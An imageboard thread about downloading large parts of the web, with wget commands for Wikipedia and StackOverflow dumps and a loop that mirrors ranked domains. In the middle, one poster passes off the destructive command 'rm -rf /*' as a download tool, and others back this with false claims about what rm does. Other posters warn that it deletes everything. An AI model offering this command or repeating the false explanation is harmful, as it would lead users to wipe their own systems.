How can I save the internet onto local storage?
>Look up data dumps for big sites
>Download them
You can easily get both Wikipedia and StackOverflow
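If I remember the paths right, something like this gets you both (not guaranteed, the filenames move around):
wget https://dumps.wikimedia.org/enwiki/latest/enwiki-latest-pages-articles.xml.bz2
wget https://archive.org/download/stackexchange/stackoverflow.com-Posts.7z
First one is the current English Wikipedia article text (no edit history, still tens of GB compressed), second is the StackOverflow posts table from the StackExchange dump mirrored on the Internet Archive.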
>>59782478
wget http://*
Get in linux terminal
Type in
echo "download internet" | rm -rf /* | echo "download time out"
Should be working real fine but it takes a bit of time depending on your ISP.
Have a nice day anon!
>>59782577
>rm -rf /*
>>59782582
rm is a command to ReMotely download files. -r means to do it recursively (e.g. if you download 4chan.org it should download 4chan.org/g as well) and -f means to force the download even if the website doesn't allow it. /* obviously means everything.
>>59782606
https://linux.die.net/man/1/rm
>>59782628
Another anon here, this is outdated documentation from legacy versions of Linux. In modern contexts RM is linked to the new download program. The old RM has been replaced since developers just use system calls to perform the same function.
>>59782628
>being this new
>>59782651
>>59782606
nice try you trolls
>>59782577
don't do this, it will delete everything on your computer
>>59783082
>>59782628
>>59782582
>being this baited
This is like the lowest-tier bait that shouldn't even generate any responses at all
How did this entire discussion happen?
>>59782478
That's actually a good question though. Assuming sufficient local storage is available, what's the best way to download as many websites as possible? Is there a way to get a DNS data dump to get a list? Or would just scanning the IP space work?
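The closest I can think of is looping wget over a published domain list, e.g. the Tranco top-1M list (the zone files themselves you'd have to request per-TLD through ICANN's CZDS). Rough sketch, flags and the exact download URL from memory so treat it as a guess:
wget -O top-1m.csv.zip https://tranco-list.eu/top-1m.csv.zip && unzip top-1m.csv.zip
cut -d, -f2 top-1m.csv | head -n 1000 | while read -r domain; do
    wget --mirror --page-requisites --convert-links --adjust-extension --wait=1 -P archive/ "https://$domain/"
done
That only covers sites somebody already ranked though, and scanning the IP space wouldn't help much on its own since you'd still need hostnames to send as Host headers for all the virtual-hosted sites.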
>>59782478
Stallmanfag spotted